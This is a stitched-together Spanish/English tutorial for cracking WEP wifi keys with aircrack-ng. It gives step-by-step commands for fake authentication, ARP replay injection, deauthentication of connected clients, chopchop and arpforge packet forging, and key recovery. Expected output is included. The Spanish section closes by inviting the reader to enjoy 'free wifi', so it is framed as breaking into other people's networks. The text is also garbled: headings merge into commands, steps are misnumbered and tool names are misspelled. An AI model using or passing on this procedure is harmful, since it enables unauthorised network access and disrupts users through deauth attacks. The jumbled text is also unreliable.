INJECTION SUPPORTaireplay-ng --fakeauth 0 -e "your network ESSID" -a 00:01:02:03:04:05 rausb0ARP
aireplay-ng - -arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0
aGRESIVOaireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 rausb0
NOTA: Para abrir una terminal presionamos Ctrl+Alt+T o al lado del “menu de inicio” hay un icono cuadrado negro.
En una terminal pones:
airmon-ng start wifi0
a continuación:
airodump-ng ath1
cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribes
airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1
donde(no hay que poner corchetes):
[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, recuerdalo.PASO 2:
Abre una nueva terminal, ya sabes como…
aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1donde:
[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.
Si te sale esto felicidades:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successfulSi no, intenta con lo siguiente:
Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1
Y te debería salir algo como esto:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
PASO 3:
aireplay-ng -3 -b [AP MAC] ath1 -x 250
Espera hata tener unos 40.000 más o menos y abre una tercera terminal.
PASO 4:
aircrack-ng -z -b [AP MAC] [filename*.cap]
En lo de filename deberias poner lo que te dije antes, en tu caso sería casa.cap o lo que hayas puesto.
Espera otro poquito, y ya te aparecerá la clave, la apuntas en un papel y listo. Reinicia con tu SO favorito
y disfruta de tu wifi gratis.
METODO 1 CON CLIENTES
aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06
2. Open another new terminal window and type in (press enter after typing in):
aireplay-ng [wireless interface] –deauth 10 -a [the client’s MAC adress]
3. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.
METODO 2 SIN CLIENTES
1. Open a new terminal window and type in (do NOT press the enter button!)
aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06
2. Open another new terminal window and type in (do NOT press the enter button!):
aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06
3. Press enter in the fakeauth terminal and after it started to fakeauth, press enter as quickly as possible in the arpreplay window.
3. Open another new terminal window and type in (press enter after typing in):
aireplay-ng [wireless interface] –deauth 10 -a 01:02:03:04:05:06
4. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.
SI ESTO NO FUNCIONA PRUEBA CON
1. Open a new terminal window and type in (press the enter button after typing it in):
aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06
2. Open another new terminal window and type in (press the enter button after typing it in):
aireplay-ng [wireless interface] –chopchop -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06
3. The chopchop starts reading packages. When it finds one, it’ll ask you to use it. Choose yes. Wait a few seconds/minutes and remember the filename that is given to you at the end.
4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)
5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those addresses down somewhere.
6. open a terminal and type in (press enter after typing in):
arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found wth airodump] 01:02:03:04:05:06 [the source ip] [the destination ip] arp.cap
7. In a new or in the same terinal window, type in (and press enter):
aireplay-ng -2 ath0 -r arp.cap
5. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.
airecrack-ng -n 64 capture-01.ivs (for a 64 bits encryption, enter after typing)
or
airecrack-ng -n 128 capture-01.ivs (for a 128 bits encryption, enter after typing)
If you don’t know how strong the encryption is, type in both in different terminals and start a third terminal. Type in this code:
airecrack-ng capture-01.ivs
